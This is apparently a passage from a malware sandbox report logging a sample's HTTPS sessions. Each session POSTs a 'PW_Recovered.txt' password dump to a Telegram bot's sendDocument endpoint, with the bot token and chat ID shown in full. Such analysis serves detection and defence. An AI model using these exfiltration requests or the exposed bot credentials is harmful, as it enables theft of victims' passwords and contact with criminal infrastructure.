                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:55 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41021,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546875,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.750026149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:56 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3d660101deb3
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:56 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 36 36 30 31 30 31 64 65 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3d660101deb3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:56 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:56 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:56 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41022,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546876,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.750027149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:57 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3daa9f561b06
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:07:57 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 61 61 39 66 35 36 31 62 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3daa9f561b06Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:00 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41023,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546880,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.750028149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:01 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3eeb5953a21e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:08:01 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 65 62 35 39 35 33 61 32 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3eeb5953a21eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:01 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:01 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:01 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41024,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546881,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.750029149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:02 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3f3a5e4d32a9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:08:02 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 66 33 61 35 65 34 64 33 32 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3f3a5e4d32a9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:02 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:02 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:02 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41025,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546882,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.750030149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:03 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3f8930aa35eb
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:08:03 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 66 38 39 33 30 61 61 33 35 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3f8930aa35ebContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:03 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:03 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:03 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41026,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546883,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            46192.168.2.750031149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:04 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd41b206a536e3
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:08:04 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 31 62 32 30 36 61 35 33 36 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd41b206a536e3Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:08:04 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:08:04 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:08:04 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41027,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546884,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            47192.168.2.750032149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:08:05 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd423c7dda7c4d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:08:05 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 32 33 63 37 64 64 61 37 63 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd423c7dda7c4dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
